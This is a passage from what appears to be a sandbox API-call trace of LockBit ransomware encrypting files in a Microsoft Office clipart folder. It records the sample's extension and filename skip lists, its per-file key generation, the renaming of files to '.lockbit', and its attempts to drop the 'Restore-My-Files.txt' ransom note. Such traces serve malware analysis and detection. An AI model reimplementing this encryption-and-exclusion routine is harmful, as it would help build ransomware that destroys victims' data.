lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.865] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.865] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.866] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.866] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.867] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.867] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.867] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0321179.JPG") returned 1 [0158.867] lstrcmpiW (lpString1="ntldr", lpString2="J0321179.JPG") returned 1 [0158.867] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0321179.JPG") returned 1 [0158.867] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0321179.JPG") returned -1 [0158.867] lstrcmpiW (lpString1="autorun.inf", lpString2="J0321179.JPG") returned -1 [0158.867] lstrcmpiW (lpString1="thumbs.db", lpString2="J0321179.JPG") returned 1 [0158.867] lstrcmpiW (lpString1="iconcache.db", lpString2="J0321179.JPG") returned -1 [0158.867] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.867] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG") returned=".JPG" [0158.867] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.867] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.867] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.867] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.868] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.868] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.868] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.868] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.868] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.868] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.868] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.868] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.868] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG.lockbit") returned 72 [0158.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0321179.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0158.873] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.874] malloc (_Size=0x40068) returned 0x3d70450 [0158.874] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=9431) returned 1 [0158.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0158.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0158.875] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0158.878] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.878] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.878] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.879] free (_Block=0x1fa2ed8) [0158.880] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.880] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.880] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.880] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2ff8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0324694.WMF", cAlternateFileName="")) returned 1 [0158.880] lstrcmpiW (lpString1=".", lpString2="J0324694.WMF") returned -1 [0158.880] lstrcmpiW (lpString1="..", lpString2="J0324694.WMF") returned -1 [0158.880] PathFindExtensionW (pszPath="J0324694.WMF") returned=".WMF" [0158.880] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.880] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.881] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.881] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.882] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0324694.WMF") returned 1 [0158.882] lstrcmpiW (lpString1="ntldr", lpString2="J0324694.WMF") returned 1 [0158.882] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0324694.WMF") returned 1 [0158.882] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0324694.WMF") returned -1 [0158.882] lstrcmpiW (lpString1="autorun.inf", lpString2="J0324694.WMF") returned -1 [0158.882] lstrcmpiW (lpString1="thumbs.db", lpString2="J0324694.WMF") returned 1 [0158.882] lstrcmpiW (lpString1="iconcache.db", lpString2="J0324694.WMF") returned -1 [0158.882] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.883] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324694.WMF") returned=".WMF" [0158.883] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.883] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.883] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.884] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.884] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324694.WMF.lockbit") returned 72 [0158.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0324694.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0158.885] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.885] malloc (_Size=0x40068) returned 0x3f70048 [0158.885] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=12280) returned 1 [0158.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0158.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0158.887] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0158.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324694.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324694.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.893] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.893] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.894] free (_Block=0x1fa2ed8) [0158.894] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324694.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.894] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.894] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.894] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2e7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0324704.WMF", cAlternateFileName="")) returned 1 [0158.894] lstrcmpiW (lpString1=".", lpString2="J0324704.WMF") returned -1 [0158.895] lstrcmpiW (lpString1="..", lpString2="J0324704.WMF") returned -1 [0158.895] PathFindExtensionW (pszPath="J0324704.WMF") returned=".WMF" [0158.895] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.895] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.896] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.896] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0324704.WMF") returned 1 [0158.897] lstrcmpiW (lpString1="ntldr", lpString2="J0324704.WMF") returned 1 [0158.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0324704.WMF") returned 1 [0158.897] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0324704.WMF") returned -1 [0158.897] lstrcmpiW (lpString1="autorun.inf", lpString2="J0324704.WMF") returned -1 [0158.897] lstrcmpiW (lpString1="thumbs.db", lpString2="J0324704.WMF") returned 1 [0158.897] lstrcmpiW (lpString1="iconcache.db", lpString2="J0324704.WMF") returned -1 [0158.897] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.897] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324704.WMF") returned=".WMF" [0158.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.897] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.897] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0158.898] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0158.898] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324704.WMF.lockbit") returned 72 [0158.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324704.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0324704.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.900] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.900] malloc (_Size=0x40068) returned 0x3df0008 [0158.900] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11902) returned 1 [0158.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.901] 